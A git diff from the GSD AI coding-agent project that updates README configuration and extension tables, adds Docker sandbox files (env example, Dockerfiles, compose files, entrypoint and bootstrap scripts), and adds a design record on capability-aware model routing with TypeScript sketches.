```yaml --- @@ -501,7 +502,7 @@ auto_report: true | `skill_rules` | Situational rules for skill routing | | `skill_staleness_days` | Skills unused for N days get deprioritized (default: 60, 0 = disabled) | | `unique_milestone_ids` | Uses unique milestone names to avoid clashes when working in teams of people | -| `git.isolation` | `worktree` (default), `branch`, or `none` — disable worktree isolation for projects that don't need it | +| `git.isolation` | `none` (default), `worktree`, or `branch` — enable worktree or branch isolation for milestone work | | `git.manage_gitignore` | Set `false` to prevent GSD from modifying `.gitignore` | | `verification_commands`| Array of shell commands to run after task execution (e.g., `["npm run lint", "npm run test"]`) | | `verification_auto_fix`| Auto-retry on verification failures (default: true) | @@ -542,7 +543,7 @@ See the full [Token Optimization Guide](./docs/token-optimization.md) for detail ### Bundled Tools -GSD ships with 19 extensions, all loaded automatically: +GSD ships with 24 extensions, all loaded automatically: | Extension | What it provides | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------- | @@ -564,7 +565,12 @@ GSD ships with 19 extensions, all loaded automatically: | **Remote Questions** | Route decisions to Slack/Discord when human input is needed in headless/CI mode | | **Universal Config** | Discover and import MCP servers and rules from other AI coding tools | | **AWS Auth** | Automatic Bedrock credential refresh for AWS-hosted models | -| **TTSR** | Tool-use type-safe runtime validation | +| **Ollama** | First-class local LLM support via Ollama | +| **Claude Code CLI** | External provider extension for Claude Code CLI | +| **cmux** | Claude multiplexer integration — desktop notifications, sidebar metadata, visual subagent splits | +| **GitHub Sync** | Auto-sync milestones to GitHub Issues, PRs, and 
Milestones | +| **LSP** | Language Server Protocol — diagnostics, definitions, references, hover, rename | +| **TTSR** | Tool-triggered system rules — conditional context injection based on tool usage | ### Bundled Agents @@ -611,7 +617,7 @@ The best practice for working in teams is to ensure unique milestone names acros ### Unique Milestone Names -Create or amend your `.gsd/preferences.md` file within the repo to include `unique_milestone_ids: true` e.g. +Create or amend your `.gsd/PREFERENCES.md` file within the repo to include `unique_milestone_ids: true` e.g. ```markdown --- @@ -620,7 +626,7 @@ unique_milestone_ids: true --- ``` -With the above `.gitignore` set up, the `.gsd/preferences.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions. +With the above `.gitignore` set up, the `.gsd/PREFERENCES.md` file is checked into the repo ensuring all teammates use unique milestone names to avoid collisions. Milestone names will now be generated with a 6 char random string appended e.g. instead of `M001` you'll get something like `M001-ush8s3` @@ -628,7 +634,7 @@ Milestone names will now be generated with a 6 char random string appended e.g. 1. Ensure you are not in the middle of any milestones (clean state) 2. Update the `.gsd/` related entries in your `.gitignore` to follow the `Suggested .gitignore setup` section under `Working in teams` (ensure you are no longer blanket ignoring the whole `.gsd/` directory) -3. Update your `.gsd/preferences.md` file within the repo as per section `Unique Milestone Names` +3. Update your `.gsd/PREFERENCES.md` file within the repo as per section `Unique Milestone Names` 4. If you want to update all your existing milestones use this prompt in GSD: `I have turned on unique milestone ids, please update all old milestone ids to use this new format e.g. M001-abc123 where abc123 is a random 6 char lowercase alpha numeric string. 
Update all references in all .gsd file contents, file names and directory names. Validate your work once done to ensure referential integrity.` 5. Commit to git @@ -649,7 +655,7 @@ gsd (CLI binary) ├─ resource-loader.ts Syncs bundled extensions + agents to ~/.gsd/agent/ └─ src/resources/ ├─ extensions/gsd/ Core GSD extension (auto, state, commands, ...) - ├─ extensions/... 18 supporting extensions + ├─ extensions/... 23 supporting extensions ├─ agents/ scout, researcher, worker ├─ AGENTS.md Agent routing instructions └─ GSD-WORKFLOW.md Manual bootstrap protocol diff --git a/docker/.env.example b/docker/.env.example new file mode 100644 index 000000000..ca9c3db84 --- /dev/null +++ b/docker/.env.example @@ -0,0 +1,44 @@ +# ────────────────────────────────────────────── +# GSD Docker Sandbox — Environment Variables +# Copy this file to .env and fill in your keys. +# ────────────────────────────────────────────── + +# ── Container User Identity ── +# Match your host UID/GID to avoid permission issues on bind mounts. +# Run `id -u` and `id -g` on your host to find the right values. +PUID=1000 +PGID=1000 + +# ── LLM Provider API Keys (at least one required) ── + +# Anthropic (Claude) +# ANTHROPIC_API_KEY=sk-ant-... + +# OpenAI +# OPENAI_API_KEY=sk-... + +# Google (Gemini) +# GOOGLE_API_KEY=... + +# OpenRouter (multi-provider gateway) +# OPENROUTER_API_KEY=sk-or-... + +# ── Optional: Research & Search Tools ── + +# Brave Search API +# BRAVE_API_KEY=... + +# Tavily Search API +# TAVILY_API_KEY=tvly-... + +# Jina AI (reader/search) +# JINA_API_KEY=... + +# ── Optional: Git & GitHub ── + +# GitHub personal access token (for PR operations) +# GITHUB_TOKEN=ghp_... 
+ +# Git author identity inside the sandbox +# GIT_AUTHOR_NAME=Your Name +# GIT_AUTHOR_EMAIL=you@example.com diff --git a/docker/Dockerfile.ci-builder b/docker/Dockerfile.ci-builder new file mode 100644 index 000000000..822651db4 --- /dev/null +++ b/docker/Dockerfile.ci-builder @@ -0,0 +1,20 @@ +# ────────────────────────────────────────────── +# CI Builder +# Image: ghcr.io/gsd-build/gsd-ci-builder +# Used by: pipeline.yml Dev stage +# ────────────────────────────────────────────── +FROM node:24-bookworm + +# Rust toolchain (stable, minimal profile) +RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal +ENV PATH="/root/.cargo/bin:${PATH}" + +# Cross-compilation for linux-arm64 +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc-aarch64-linux-gnu \ + g++-aarch64-linux-gnu \ + && rustup target add aarch64-unknown-linux-gnu \ + && rm -rf /var/lib/apt/lists/* + +# Verify toolchain +RUN node --version && rustc --version && cargo --version diff --git a/docker/Dockerfile.sandbox b/docker/Dockerfile.sandbox new file mode 100644 index 000000000..596bdf803 --- /dev/null +++ b/docker/Dockerfile.sandbox @@ -0,0 +1,42 @@ +# ────────────────────────────────────────────── +# GSD Docker Sandbox Template +# Base: docker/sandbox-templates:shell +# Purpose: Isolated environment for GSD auto mode +# Usage: docker sandbox create --template ./docker +# ────────────────────────────────────────────── +FROM node:24-bookworm-slim + +# System dependencies required by GSD +RUN apt-get update && apt-get install -y --no-install-recommends \ + git \ + curl \ + ca-certificates \ + openssh-client \ + gosu \ + && rm -rf /var/lib/apt/lists/* + +# Install GSD globally — version controlled via build arg +ARG GSD_VERSION=latest +RUN npm install -g gsd-pi@${GSD_VERSION} + +# Create non-root user for sandbox isolation +RUN groupadd --gid 1000 gsd \ + && useradd --uid 1000 --gid gsd --shell /bin/bash --create-home 
gsd + +# Persistent GSD state directory +RUN mkdir -p /home/gsd/.gsd && chown -R gsd:gsd /home/gsd/.gsd + +# Workspace directory — synced from host via Docker sandbox +WORKDIR /workspace +RUN chown gsd:gsd /workspace + +# Entrypoint handles UID/GID remapping, bootstrap, and drops to gsd user +COPY entrypoint.sh /usr/local/bin/entrypoint.sh +COPY bootstrap.sh /usr/local/bin/bootstrap.sh +RUN chmod +x /usr/local/bin/entrypoint.sh /usr/local/bin/bootstrap.sh + +# Expose default GSD web UI port +EXPOSE 3000 + +ENTRYPOINT ["/usr/local/bin/entrypoint.sh"] +CMD ["gsd", "--help"] diff --git a/docker/README.md b/docker/README.md new file mode 100644 index 000000000..4d9e8ae06 --- /dev/null +++ b/docker/README.md @@ -0,0 +1,144 @@ +# GSD Docker Sandbox + +Run GSD auto mode inside an isolated Docker sandbox so it cannot touch your host filesystem, SSH keys, or other projects. + +## Prerequisites + +- Docker Desktop 4.58+ (macOS or Windows; Linux support is experimental) +- At least one LLM provider API key + +## Docker Images + +| File | Purpose | +|------|---------| +| `Dockerfile.sandbox` | Runtime sandbox with entrypoint (UID remapping, bootstrap) | +| `Dockerfile.ci-builder` | CI builds — includes build tools, no entrypoint magic | + +## Compose Files + +| File | Purpose | +|------|---------| +| `docker-compose.yaml` | Minimal zero-config setup — just works with sensible defaults | +| `docker-compose.full.yaml` | Fully documented reference with all options, resource limits, health checks | + +Start with `docker-compose.yaml`. Copy options from `docker-compose.full.yaml` when you need them. + +## Quick Start + +### Option A: Docker Sandbox CLI (recommended) + +Docker Sandboxes provide MicroVM isolation — each sandbox runs in a lightweight VM with its own kernel and private Docker daemon. 
+ +```bash +# Create a sandbox from the template +docker sandbox create --template ./docker --name gsd-sandbox + +# Shell into the sandbox +docker sandbox exec -it gsd-sandbox bash + +# Inside the sandbox, run GSD +gsd auto "implement the feature described in issue #42" +``` + +### Option B: Docker Compose + +For environments without Docker Sandbox support, use Compose for container-level isolation: + +```bash +# 1. Configure API keys +cp docker/.env.example docker/.env +# Edit docker/.env with your keys + +# 2. Start the sandbox +docker compose -f docker/docker-compose.yaml up -d + +# 3. Shell into the container +docker exec -it gsd-sandbox bash + +# 4. Run GSD inside the container +gsd auto "implement the feature described in issue #42" +``` + +## UID/GID Remapping + +The entrypoint handles UID/GID remapping via `PUID` and `PGID` environment variables. This avoids permission issues on bind-mounted volumes by matching the container's `gsd` user to your host UID/GID. + +```bash +# Find your host UID/GID +id -u # PUID +id -g # PGID +``` + +Set these in your `.env` file or in the `environment` section of the compose file. Defaults to `1000:1000`. + +## Entrypoint Behavior + +The container entrypoint (`entrypoint.sh`) runs four steps on every start: + +1. **UID/GID remapping** — adjusts the `gsd` user to match `PUID`/`PGID` +2. **Pre-create critical files** — prevents Docker bind-mount from creating directories where files are expected +3. **Sentinel-based bootstrap** — runs `bootstrap.sh` exactly once on first boot +4. **Drop privileges** — `exec gosu gsd` for proper PID 1 signal forwarding + +No hardcoded `user:` directive in compose — the entrypoint starts as root, remaps, then drops to `gsd`. 
+ +## Two-Terminal Workflow + +GSD's recommended workflow uses two terminals — one for auto mode, one for interactive discussion: + +```bash +# Terminal 1: auto mode +docker sandbox exec -it gsd-sandbox bash +gsd auto "your task description" + +# Terminal 2: discuss / monitor +docker sandbox exec -it gsd-sandbox bash +gsd discuss +``` + +With Docker Compose, replace `docker sandbox exec` with `docker exec`. + +## Credential Injection + +### Docker Sandbox (automatic) + +Docker's proxy layer forwards API keys set in your host shell config (`~/.bashrc`, `~/.zshrc`) into the sandbox automatically. Keys are never stored inside the sandbox. + +### Docker Compose (manual) + +Copy `docker/.env.example` to `docker/.env` and fill in your keys. The `.env` file is gitignored and never committed. + +## Network Allowlisting + +If you restrict outbound network access in your sandbox, GSD needs these endpoints: + +| Purpose | Endpoints | +|---------|-----------| +| LLM APIs | `api.anthropic.com`, `api.openai.com`, `generativelanguage.googleapis.com`, `openrouter.ai` | +| Package registry | `registry.npmjs.org` | +| Research tools | `api.search.brave.com`, `api.tavily.com`, `r.jina.ai` | +| GitHub | `api.github.com`, `github.com` | + +## Customizing the Image + +Build with a specific GSD version: + +```bash +docker compose -f docker/docker-compose.yaml build --build-arg GSD_VERSION=2.51.0 +``` + +## Cleanup + +```bash +# Docker Sandbox +docker sandbox rm gsd-sandbox + +# Docker Compose +docker compose -f docker/docker-compose.yaml down -v +``` + +## Known Limitations + +- **macOS/Windows only**: Docker Sandboxes require Docker Desktop 4.58+. Linux sandbox support is experimental. +- **Environment parity**: The sandbox runs Ubuntu (Debian). macOS-only dependencies may not work inside the sandbox. +- **Named agent registration**: Docker Desktop's built-in named agents (claude, codex, etc.) are registered by Docker itself. Third-party tools cannot register new named agents. 
GSD uses the generic shell sandbox type with a custom template instead. diff --git a/docker/bootstrap.sh b/docker/bootstrap.sh new file mode 100755 index 000000000..463952877 --- /dev/null +++ b/docker/bootstrap.sh @@ -0,0 +1,27 @@ +#!/bin/bash +set -e + +# ────────────────────────────────────────────── +# GSD First-Boot Bootstrap +# +# Runs once on initial container creation. +# Called by entrypoint.sh as the gsd user. +# +# This script is idempotent — safe to run multiple +# times, but the sentinel in entrypoint.sh ensures +# it only runs once in practice. +# ────────────────────────────────────────────── + +# ── Git Identity ──────────────────────────────────────── +# Without this, git commits inside the container will fail +# or use garbage defaults. + +if [ -n "${GIT_AUTHOR_NAME}" ]; then + git config --global user.name "${GIT_AUTHOR_NAME}" +fi + +if [ -n "${GIT_AUTHOR_EMAIL}" ]; then + git config --global user.email "${GIT_AUTHOR_EMAIL}" +fi + +echo "Bootstrap complete." diff --git a/docker/docker-compose.full.yaml b/docker/docker-compose.full.yaml new file mode 100644 index 000000000..6ff8cad83 --- /dev/null +++ b/docker/docker-compose.full.yaml @@ -0,0 +1,61 @@ +services: + gsd: + build: + context: . # Build context is the docker/ directory + dockerfile: Dockerfile.sandbox # Runtime sandbox image with entrypoint + args: + GSD_VERSION: latest # Pin a specific version: GSD_VERSION=2.51.0 + + container_name: gsd-sandbox + + ports: + - "3000:3000" # GSD web UI + + volumes: + - ../:/workspace # Project root mounted into the container + - gsd-state:/home/gsd/.gsd # Persistent GSD state across restarts + # - ~/.ssh:/home/gsd/.ssh:ro # SSH keys for git operations (read-only) + # - ~/.gitconfig:/home/gsd/.gitconfig:ro # Host git config + + env_file: + - .env # API keys and secrets (see .env.example) + + environment: + - NODE_ENV=development + # UID/GID remapping — match your host user to avoid permission issues + # on bind-mounted volumes. 
The entrypoint remaps the container's gsd + # user to these IDs at startup. Run `id -u` / `id -g` to find yours. + - PUID=1000 + - PGID=1000 + # Git identity inside the container (overrides .env if set here) + # - GIT_AUTHOR_NAME=Your Name + # - GIT_AUTHOR_EMAIL=you@example.com + + stdin_open: true # Keep stdin open for interactive use + tty: true # Allocate a pseudo-TTY + + # Health check — verify GSD is installed and responsive + healthcheck: + test: ["CMD", "gsd", "--version"] + interval: 30s + timeout: 5s + retries: 3 + start_period: 10s + + # Resource limits — uncomment to constrain container resources + # deploy: + # resources: + # limits: + # cpus: "4.0" + # memory: 8G + # reservations: + # cpus: "1.0" + # memory: 2G + + # Network mode — uncomment ONE if you need host networking + # network_mode: host # Full host network access (no port mapping needed) + # network_mode: bridge # Default Docker bridge (already the default) + +volumes: + gsd-state: + driver: local diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml new file mode 100644 index 000000000..21641e2f1 --- /dev/null +++ b/docker/docker-compose.yaml @@ -0,0 +1,23 @@ +services: + gsd: + build: + context: . + dockerfile: Dockerfile.sandbox + args: + GSD_VERSION: latest + container_name: gsd-sandbox + ports: + - "3000:3000" + volumes: + - ../:/workspace + - gsd-state:/home/gsd/.gsd + env_file: + - .env + environment: + - NODE_ENV=development + stdin_open: true + tty: true + +volumes: + gsd-state: + driver: local diff --git a/docker/entrypoint.sh b/docker/entrypoint.sh new file mode 100755 index 000000000..465a28fe0 --- /dev/null +++ b/docker/entrypoint.sh @@ -0,0 +1,81 @@ +#!/bin/bash +set -e + +# ────────────────────────────────────────────── +# GSD Container Entrypoint +# +# Responsibilities: +# 1. UID/GID remapping — match host user via PUID/PGID +# 2. Pre-create critical files — prevent Docker bind-mount +# from creating directories where files are expected +# 3. 
Sentinel-based bootstrap — one-time first-boot setup +# 4. Signal forwarding — exec into the final process +# ────────────────────────────────────────────── + +GSD_USER="gsd" +GSD_HOME="/home/${GSD_USER}" +GSD_DIR="${GSD_HOME}/.gsd" + +# ── 1. UID/GID Remapping ──────────────────────────────── +# Accept PUID/PGID from the environment so the container +# can run with the same UID/GID as the host user, avoiding +# permission headaches on bind-mounted volumes. + +PUID="${PUID:-1000}" +PGID="${PGID:-1000}" + +CURRENT_UID=$(id -u "${GSD_USER}") +CURRENT_GID=$(id -g "${GSD_USER}") + +REMAPPED=0 + +if [ "${PGID}" != "${CURRENT_GID}" ]; then + groupmod -o -g "${PGID}" "${GSD_USER}" + REMAPPED=1 +fi + +if [ "${PUID}" != "${CURRENT_UID}" ]; then + usermod -o -u "${PUID}" "${GSD_USER}" + REMAPPED=1 +fi + +# Fix ownership only when UID/GID actually changed +if [ "${REMAPPED}" -eq 1 ]; then + chown -R "${PUID}:${PGID}" "${GSD_HOME}" + chown "${PUID}:${PGID}" /workspace +fi + +# ── 2. Pre-create Critical Files ──────────────────────── +# Docker bind-mounts will create a *directory* if the target +# path doesn't exist. We need these to be files, so touch +# them before Docker gets a chance to mangle things. + +mkdir -p "${GSD_DIR}" + +if [ ! -f "${GSD_DIR}/settings.json" ]; then + echo '{}' > "${GSD_DIR}/settings.json" +fi + +chown "${PUID}:${PGID}" "${GSD_DIR}" "${GSD_DIR}/settings.json" + +# ── 3. Sentinel-based Bootstrap ───────────────────────── +# Run first-boot setup exactly once. Subsequent container +# starts (or restarts) skip this entirely. + +SENTINEL="${GSD_DIR}/.bootstrapped" + +if [ ! -f "${SENTINEL}" ]; then + if [ -x /usr/local/bin/bootstrap.sh ]; then + # Run bootstrap as the gsd user so files get correct ownership + gosu "${GSD_USER}" /usr/local/bin/bootstrap.sh + fi + touch "${SENTINEL}" + chown "${PUID}:${PGID}" "${SENTINEL}" +fi + +# ── 4. 
Drop Privileges & Exec ────────────────────────── +# Replace this shell process with the final command running +# as the gsd user. exec + gosu = proper PID 1 = proper +# signal forwarding (SIGTERM, SIGINT, etc.). + +exec gosu "${GSD_USER}" "$@" diff --git a/docs/ADR-004-capability-aware-model-routing.md b/docs/ADR-004-capability-aware-model-routing.md new file mode 100644 index 000000000..c2ce3d2d2 --- /dev/null +++ b/docs/ADR-004-capability-aware-model-routing.md @@ -0,0 +1,460 @@ +# ADR-004: Capability-Aware Model Routing + +**Status:** Implemented (Phase 2) +**Date:** 2026-03-26 +**Revised:** 2026-04-03 +**Deciders:** Jeremy McSpadden +**Related:** ADR-003 (pipeline simplification), [Issue #2655](https://github.com/gsd-build/gsd-2/issues/2655), `docs/dynamic-model-routing.md` + +## Context + +GSD already supports dynamic model routing in auto-mode, but the current router is fundamentally **complexity-tier and cost based**, not **task-capability based**. + +Today the selection pipeline is: + +``` +unit dispatch + → classifyUnitComplexity(unitType, unitId, basePath, budgetPct) + → UNIT_TYPE_TIERS default mapping + → analyzeTaskComplexity() / analyzePlanComplexity() [metadata heuristics] + → getAdaptiveTierAdjustment() [routing history] + → applyBudgetPressure() [budget ceiling] + → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds) + → downgrade-only: never upgrades beyond user's configured model + → MODEL_CAPABILITY_TIER lookup → cheapest available in tier + → fallback chain assembly + → resolveModelId() → pi.setModel() + → before_provider_request hook (payload mutation only) +``` + +This architecture works when all models inside a tier are effectively interchangeable. That assumption no longer holds. + +Users increasingly configure heterogeneous provider pools through `models.json`, scoped provider setup, and `/scoped-models`. 
In practice: + +- Claude-class models often perform best on greenfield implementation and architecture work +- Codex-class models often perform best on debugging, refactoring, and root-cause analysis +- Gemini-class models often perform best on long-context synthesis and research-heavy tasks +- Fast small models are often best for cheap validation, triage, and lightweight hooks + +The current router cannot express those differences. If Claude and Codex are both available at the same tier, GSD either: + +- treats them as equivalent and picks the cheaper one, or +- requires the user to hardcode specific phase models manually + +That produces three structural problems: + +### 1. Wrong optimization target + +The router optimizes primarily for **task difficulty vs model cost**. The real problem is **task requirements vs model strengths**, subject to cost constraints. + +### 2. Poor behavior with heterogeneous pools + +Different users have different subscriptions and provider access. A fixed mapping like "research always uses Gemini" does not generalize when the user only has Claude + Codex, or only local models. + +### 3. Capability knowledge is trapped in user intuition + +Experienced users know which models are better at coding, debugging, research, long-context work, or instruction following. GSD has no representation for that knowledge, so it cannot route intelligently on the user's behalf. 
+ +The system already has several building blocks that make a richer router feasible: + +- unit types already encode the kind of work being dispatched +- `complexity-classifier.ts` already extracts rich `TaskMetadata` (file counts, dependency counts, tags, complexity keywords, code block counts) +- `auto-dispatch.ts` and prompt builders provide stable task categories +- `ctx.modelRegistry.getAvailable()` exposes the current model pool +- `models.json` already supports user overrides and cost data per model +- budget ceilings, routing history, and retry escalation already exist +- the `model_select` hook fires on model changes and could be extended for pre-selection interception + +## Decision + +**Extend dynamic routing from a one-dimensional tier system to a two-dimensional system that combines complexity classification ("how hard") with capability scoring ("what kind"), while preserving downgrade-only semantics, budget controls, and user overrideability.** + +### Design Principles + +1. **Downgrade-only invariant is preserved.** The user's configured model for a phase is always the ceiling. Capability scoring ranks models within the eligible set — it never promotes above the user's configured model. + +2. **Complexity classification remains.** The existing `classifyUnitComplexity()` pipeline (unit type defaults, task plan analysis, adaptive learning, budget pressure) continues to determine tier eligibility. Capability scoring selects among tier-eligible models. + +3. **Cost is a constraint, not a score dimension.** Budget pressure constrains which models are eligible. Capability profiles describe what models are good at, not what they cost. + +4. **Requirement vectors are dynamic, not static.** Task requirements are computed from `(unitType, TaskMetadata)`, not from unit type alone. 
+ +### The Revised Routing Pipeline + +``` +unit dispatch + → classifyUnitComplexity(unitType, unitId, basePath, budgetPct) + [unchanged — determines tier eligibility and budget filtering] + → resolveModelForComplexity(classification, phaseConfig, routingConfig, availableModelIds) + → STEP 1: filter to tier-eligible models (downgrade-only from user ceiling) + → STEP 2: if capability routing enabled AND >1 eligible model: + → computeTaskRequirements(unitType, taskMetadata) + → scoreEligibleModels(eligible, taskRequirements) + → select highest-scoring model (deterministic tie-break by cost, then ID) + → STEP 3: assemble fallback chain + → resolveModelId() → pi.setModel() +``` + +### Model Capability Profiles + +Each model gains an optional capability profile: + +```ts +interface ModelCapabilities { + coding: number; // greenfield implementation, code generation + debugging: number; // root-cause analysis, error diagnosis, refactoring + research: number; // information synthesis, investigation, exploration + reasoning: number; // multi-step logic, planning, architecture + speed: number; // response latency (inverse of thinking time) + longContext: number; // effective use of large input windows + instruction: number; // instruction following, structured output adherence +} +``` + +Scores are normalized `0–100`. Seven dimensions. No `costEfficiency` dimension — cost is handled separately by budget pressure and tier economics. + +Models without a capability profile are treated as having uniform scores across all dimensions (score 50 in each), which makes capability scoring a no-op for those models and falls back to the existing cheapest-in-tier behavior. + +### Dynamic Task Requirement Vectors + +Requirement vectors are computed as a function of `(unitType, TaskMetadata)`, not looked up from a static table. This preserves the nuance that `classifyUnitComplexity` already captures. 
+
+```ts
+function computeTaskRequirements(
+  unitType: string,
+  metadata?: TaskMetadata,
+): Partial<Record<keyof ModelCapabilities, number>> {
+  // Base vector from unit type
+  const base = BASE_REQUIREMENTS[unitType] ?? { reasoning: 0.5 };
+
+  // Refine based on task metadata (only for execute-task)
+  if (unitType === "execute-task" && metadata) {
+    // Docs/config/rename tasks → boost instruction, reduce coding
+    if (metadata.tags?.some(t => /^(docs?|readme|comment|config|typo|rename)$/i.test(t))) {
+      return { ...base, instruction: 0.9, coding: 0.3, speed: 0.7 };
+    }
+    // Debugging keywords → boost debugging and reasoning
+    if (metadata.complexityKeywords?.some(k => k === "concurrency" || k === "compatibility")) {
+      return { ...base, debugging: 0.9, reasoning: 0.8 };
+    }
+    // Migration/architecture → boost reasoning and coding
+    if (metadata.complexityKeywords?.some(k => k === "migration" || k === "architecture")) {
+      return { ...base, reasoning: 0.9, coding: 0.8 };
+    }
+    // Many files or high estimated lines → boost coding
+    if ((metadata.fileCount ?? 0) >= 6 || (metadata.estimatedLines ?? 
0) >= 500) {
+      return { ...base, coding: 0.9, reasoning: 0.7 };
+    }
+  }
+
+  return base;
+}
+```
+
+Base requirement vectors by unit type:
+
+```ts
+const BASE_REQUIREMENTS: Record<string, Partial<Record<keyof ModelCapabilities, number>>> = {
+  "execute-task": { coding: 0.9, instruction: 0.7, speed: 0.3 },
+  "research-milestone": { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "research-slice": { research: 0.9, longContext: 0.7, reasoning: 0.5 },
+  "plan-milestone": { reasoning: 0.9, coding: 0.5 },
+  "plan-slice": { reasoning: 0.9, coding: 0.5 },
+  "replan-slice": { reasoning: 0.9, debugging: 0.6, coding: 0.5 },
+  "reassess-roadmap": { reasoning: 0.9, research: 0.5 },
+  "complete-slice": { instruction: 0.8, speed: 0.7 },
+  "run-uat": { instruction: 0.7, speed: 0.8 },
+  "discuss-milestone": { reasoning: 0.6, instruction: 0.7 },
+  "complete-milestone": { instruction: 0.8, reasoning: 0.5 },
+};
+```
+
+### Scoring Function
+
+```ts
+function scoreModel(
+  model: ModelCapabilities,
+  requirements: Partial<Record<keyof ModelCapabilities, number>>,
+): number {
+  let weightedSum = 0;
+  let weightSum = 0;
+  for (const [dim, weight] of Object.entries(requirements)) {
+    const capability = model[dim as keyof ModelCapabilities] ?? 50;
+    weightedSum += weight * capability;
+    weightSum += weight;
+  }
+  return weightSum > 0 ? weightedSum / weightSum : 50;
+}
+```
+
+This produces a **weighted average** in the range `0–100`, where each dimension's contribution is proportional to its requirement weight. The output is directly comparable across models regardless of how many dimensions the requirement vector has.
+
+**Tie-breaking:** When two models score within 2 points of each other, prefer the cheaper model (by `MODEL_COST_PER_1K_INPUT`). If cost is also equal, break ties by lexicographic model ID for determinism. 
+
+### Configuration Model
+
+Built-in capability profiles ship as a data table alongside `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` in `model-router.ts`:
+
+```ts
+const MODEL_CAPABILITY_PROFILES: Record<string, ModelCapabilities> = {
+  "claude-opus-4-6": { coding: 95, debugging: 90, research: 85, reasoning: 95, speed: 30, longContext: 80, instruction: 90 },
+  "claude-sonnet-4-6": { coding: 85, debugging: 80, research: 75, reasoning: 80, speed: 60, longContext: 75, instruction: 85 },
+  "claude-haiku-4-5": { coding: 60, debugging: 50, research: 45, reasoning: 50, speed: 95, longContext: 50, instruction: 75 },
+  "gpt-4o": { coding: 80, debugging: 75, research: 70, reasoning: 75, speed: 65, longContext: 70, instruction: 80 },
+  "gpt-4o-mini": { coding: 55, debugging: 45, research: 40, reasoning: 45, speed: 90, longContext: 45, instruction: 70 },
+  "gemini-2.5-pro": { coding: 75, debugging: 70, research: 85, reasoning: 75, speed: 55, longContext: 90, instruction: 75 },
+  "gemini-2.0-flash": { coding: 50, debugging: 40, research: 50, reasoning: 40, speed: 95, longContext: 60, instruction: 65 },
+  "deepseek-chat": { coding: 75, debugging: 65, research: 55, reasoning: 70, speed: 70, longContext: 55, instruction: 65 },
+  "o3": { coding: 80, debugging: 85, research: 80, reasoning: 92, speed: 25, longContext: 70, instruction: 85 },
+};
+```
+
+Users can override capability profiles in `models.json` per provider:
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "modelOverrides": {
+        "claude-sonnet-4-6": {
+          "capabilities": {
+            "debugging": 90,
+            "research": 85
+          }
+        }
+      }
+    }
+  }
+}
+```
+
+Partial overrides are deep-merged with built-in defaults. This uses the same `modelOverrides` path that already supports `contextWindow`, `cost`, and `compat` overrides.
+
+### Profile Versioning
+
+Built-in capability profiles are maintained alongside the existing `MODEL_CAPABILITY_TIER` and `MODEL_COST_PER_1K_INPUT` tables in `model-router.ts`. 
When the `@gsd/pi-ai` model catalog is updated with new models, the capability profile table must be updated in the same PR. A linting rule should flag any model present in `MODEL_CAPABILITY_TIER` but missing from `MODEL_CAPABILITY_PROFILES`. + +Profiles are versioned implicitly by GSD release. The existing `models.json` `modelOverrides` mechanism allows users to correct stale defaults immediately without waiting for a GSD update. + +### Extension-First Rollout + +Capability-aware routing should be prototypable as an extension before moving to core. The current hook surface is **insufficient** for this: + +- `before_provider_request` fires after model selection, at the API payload level — too late to swap model choice. +- `model_select` fires reactively when a model changes, not before selection — it cannot influence the choice. + +**Required hook addition:** A `before_model_select` hook that fires within `selectAndApplyModel()` after tier classification but before `resolveModelForComplexity()`. This hook would receive: + +```ts +interface BeforeModelSelectEvent { + unitType: string; + unitId: string; + classification: ClassificationResult; + taskMetadata: TaskMetadata; + eligibleModels: string[]; // tier-filtered available models + phaseConfig: ResolvedModelConfig; +} +``` + +Return value: `{ modelId: string } | undefined` (override selection, or undefined to use default). + +This hook enables an extension to implement capability scoring externally, test it against real workloads, and validate behavior before the logic moves into `model-router.ts`. + +**Rollout sequence:** + +1. **Phase 1:** Add `before_model_select` hook and `TaskMetadata` to `ClassificationResult`. Ship built-in capability profile data table. No core routing changes. +2. **Phase 2:** Implement capability scoring as an extension that hooks `before_model_select`. Gather user feedback through routing history. +3. 
**Phase 3:** If behavior proves stable, move scoring into `resolveModelForComplexity()` in core. Extension hook remains for custom routing strategies.
+
+### Observability
+
+Every routing decision must be inspectable. The existing `RoutingDecision` interface is extended:
+
+```ts
+interface RoutingDecision {
+  modelId: string;
+  fallbacks: string[];
+  tier: ComplexityTier;
+  wasDowngraded: boolean;
+  reason: string;
+  // New fields:
+  capabilityScores?: Record<string, number>; // model ID → score
+  taskRequirements?: Partial<Record<keyof ModelCapabilities, number>>; // dimension → weight
+  selectionMethod: "tier-only" | "capability-scored";
+}
+```
+
+When verbose mode is on, the routing notification includes the top-scoring models and why the winner was selected:
+
+```
+Dynamic routing [S]: claude-sonnet-4-6 (scored 82.3 — coding:0.9×85, debugging:0.6×80)
+  runner-up: gpt-4o (scored 78.1)
+```
+
+## Consequences
+
+### Positive
+
+#### 1. Better model-task fit
+
+Routing decisions are based on the kind of work being done, not only how expensive or complex the work appears. A debugging task routes to the strongest debugger in the pool; a research task routes to the best synthesizer.
+
+#### 2. Works across arbitrary model pools
+
+The router no longer depends on a hardcoded vendor assumption. If a user has only Claude + Codex, it can still route intelligently between them. If the user adds Gemini or local models later, the same scoring system continues to work.
+
+#### 3. Preserves all existing invariants
+
+- **Downgrade-only semantics:** capability scoring never upgrades beyond the user's configured phase model.
+- **Budget pressure:** unchanged — constrains tier eligibility before scoring runs.
+- **Retry escalation:** unchanged — escalates tier, then scoring picks the best model in the new tier.
+- **Fallback chains:** assembled the same way, with capability-scored winner as primary.
+
+#### 4. 
